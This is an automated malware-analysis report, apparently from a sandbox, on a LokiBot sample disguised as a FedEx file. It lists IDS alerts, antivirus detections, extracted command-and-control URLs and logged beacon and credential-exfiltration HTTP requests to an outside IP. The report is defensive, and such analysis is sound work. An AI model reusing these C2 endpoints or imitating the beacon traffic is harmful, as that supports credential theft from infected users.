Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:33.749822
SID:	2024313
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:49.622449
SID:	2024318
Source Port:	49733
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:01:57.173481
SID:	2025381
Source Port:	49716
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:33.749822
SID:	2024318
Source Port:	49727
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:07.384774
SID:	2024318
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Checkin - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:36.285874
SID:	2025381
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:29.494079
SID:	2024313
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:46.431591
SID:	2021641
Source Port:	49732
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:01:47.110312
SID:	2024313
Source Port:	49708
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M1 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:07.384774
SID:	2024313
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot User-Agent (Charon/Inferno) - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:02:30.532619
SID:	2021641
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN LokiBot Request for C2 Commands Detected M2 - Source IP: 192.168.2.7 - Destination IP: 45.61.137.215

Timestamp:	05/22/24-22:03:29.494079
SID:	2024318
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: FedEx_776282383902.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://kbfvzoboss.bid/alien/fre.php	URL Reputation: Label: malware
Source: http://alphastand.win/alien/fre.php	URL Reputation: Label: malware
Source: http://alphastand.trade/alien/fre.php	URL Reputation: Label: malware
Source: http://alphastand.top/alien/fre.php	URL Reputation: Label: malware
Source: http://45.61.137.215/index.php/feed/	Avira URL Cloud: Label: malware
Source: http://45.61.137.215/index.php/comments/feed/	Avira URL Cloud: Label: malware
Source: http://45.61.137.215/index.php/t?id=090	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.1218835843.000000000423E000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://45.61.137.215/index.php/t?id=090"]}

Multi AV Scanner detection for submitted file

Source: FedEx_776282383902.exe

ReversingLabs: Detection: 65%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: FedEx_776282383902.exe

Joe Sandbox ML: detected

Source: FedEx_776282383902.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: FedEx_776282383902.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\FedEx_776282383902.exe

Code function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

3_2_00403D74

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.7:49704 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49704 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49704 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.7:49704 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.7:49707 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49707 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49707 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.7:49707 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49708 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49708 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49708 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49708 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49709 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49709 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49709 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49709 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49710 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49710 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49710 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49710 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49716 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49716 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49716 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49716 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49717 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49717 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49717 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49717 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49718 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49718 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49718 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49718 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49719 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49719 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49719 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49719 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49720 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49720 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49720 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49720 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49721 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49721 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49721 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49721 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49722 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49722 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49722 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49722 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49723 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49723 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49723 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49723 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49724 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49724 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49724 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49724 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49725 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49725 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49725 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49725 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49726 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49726 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49726 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49726 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49727 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49727 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49727 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49727 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49729 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49729 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49729 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49729 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49730 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49730 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49730 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49730 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49731 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49731 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49731 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49731 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49732 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49732 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49732 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49732 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49733 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49733 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49733 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49733 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49734 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49734 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49734 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49734 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49735 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49735 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49735 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49735 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49736 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49736 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49736 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49736 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49737 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49737 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49737 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49737 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49738 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49738 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49738 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49738 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49739 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49739 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49739 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49739 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49740 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49740 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49740 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49740 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49741 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49741 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49741 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49741 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49742 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49742 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49742 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49742 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49743 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49743 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49743 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49743 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49744 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49744 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49744 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49744 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49745 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49745 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49745 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49745 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49746 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49746 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49746 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49746 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49747 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49747 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49747 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49747 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49748 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49748 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49748 -> 45.61.137.215:80
Source: Traffic	Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49748 -> 45.61.137.215:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php
Source: Malware configuration extractor	URLs: http://45.61.137.215/index.php/t?id=090

Source: Joe Sandbox View

IP Address: 45.61.137.215 45.61.137.215

Source: Joe Sandbox View

ASN Name: AS40676US AS40676US

Source: global traffic	HTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 192Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 192Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /index.php/t?id=090 HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 45.61.137.215Accept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: A316C5D8Content-Length: 165Connection: close
